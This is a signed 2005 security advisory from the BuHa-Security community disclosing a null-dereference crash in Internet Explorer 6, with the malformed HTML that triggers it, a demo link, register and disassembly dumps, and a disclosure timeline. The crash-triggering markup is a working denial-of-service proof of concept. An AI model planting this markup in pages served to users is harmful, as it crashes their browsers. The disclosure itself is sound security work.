<<< Date Index >>>     <<< Thread Index >>>

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ---------------------------------------------------
| BuHa Security-Advisory #5     |    Dec 24th, 2005 |
 ---------------------------------------------------
| Vendor   | M$ Internet Explorer 6.0               |
| URL      | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2              |
| Risk     | Low (DoS - Null Read Dereference)      |
 ---------------------------------------------------
 
o Description:
=============

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: <mshtml.dll>#7d6c74b1
===================

Following HTML code forces M$ IE 6 to crash:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
> </samp></colgroup><ul><font><menu> <code> <var>
> <sub><h2></fieldset>
> </kbd></frameset>
> </ins></map></noframes>
> </isindex>
> </code>
> </div></title>
> </del></var><isindex>
> <i>

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900490843-7d6c74b1.html

These are the register values and the ASM dump at the time of the access
violation:
eax=0129040a ebx=0129ef30 ecx=00000001 edx=012945f0 esi=00000000
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000  efl=00000246

        7d6c748b 6a0b             push    0xb
        7d6c748d 33c0             xor     eax,eax
        7d6c748f 59               pop     ecx
        7d6c7490 8bfe             mov     edi,esi
        7d6c7492 f3ab             rep     stosd
        7d6c7494 8b45f8           mov     eax,[ebp-0x8]
        7d6c7497 8906             mov     [esi],eax
        7d6c7499 897228           mov     [edx+0x28],esi
        7d6c749c e9af010000       jmp     mshtml+0x217650 (7d6c7650)
        7d6c74a1 8b4728           mov     eax,[edi+0x28]
        7d6c74a4 8b7028           mov     esi,[eax+0x28]
        7d6c74a7 897728           mov     [edi+0x28],esi
        7d6c74aa 8b4320           mov     eax,[ebx+0x20]
        7d6c74ad 668b4002         mov     ax,[eax+0x2]
FAULT ->7d6c74b1 8b4e24           mov     ecx,[esi+0x24]
                                          ds:0023:00000024=????????
        7d6c74b4 66250030         and     ax,0x3000
        7d6c74b8 662d0010         sub     ax,0x1000
        7d6c74bc 66f7d8           neg     ax
        7d6c74bf 897510           mov     [ebp+0x10],esi
        7d6c74c2 1bc0             sbb     eax,eax
        7d6c74c4 40               inc     eax
        7d6c74c5 50               push    eax
        7d6c74c6 e80c8efeff       call    mshtml+0x2002d7 (7d6b02d7)
        7d6c74cb 0fb6c0           movzx   eax,al
        7d6c74ce 48               dec     eax
        7d6c74cf 83f80c           cmp     eax,0xc
        7d6c74d2 0f877b010000     jnbe    mshtml+0x217653 (7d6c7653)
        7d6c74d8 ff2485c7796c7d   jmp     dword ptr [mshtml+0x2179c7
                                          (7d6c79c7)+eax*4]
        7d6c74df 8b4e20           mov     ecx,[esi+0x20]
        7d6c74e2 f6410208         test    byte ptr [ecx+0x2],0x8
        7d6c74e6 7419             jz      mshtml+0x217501 (7d6c7501)
        7d6c74e8 8b45fc           mov     eax,[ebp-0x4]
        7d6c74eb ff7014           push    dword ptr [eax+0x14]
        7d6c74ee 8b4610           mov     eax,[esi+0x10]
        7d6c74f1 03460c           add     eax,[esi+0xc]
        7d6c74f4 50               push    eax
        7d6c74f5 e899ba0100       call    mshtml+0x232f93 (7d6e2f93)

It appears to be a null read dereference crash which is not exploitable.


o Vulnerable versions:
=====================

The DoS vulnerability was successfully tested on:
> M$ IE 6 SP2 - Win XP Pro SP2
> M$ IE 6     - Win 2k SP4


o Disclosure Timeline:
=====================

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
20 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==========

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=========

Christian Deneke <bugtraq@xxxxxxxxxx>

- --

Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-2.txt 

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFDrdsUkCo6/ctnOpYRAuyKAKCs+kRe0D9LEpRSaBV8skBLrIWzPACfS4mU
07WulbyPImV5j9zbwi56gOo=
=JX5G
-----END PGP SIGNATURE-----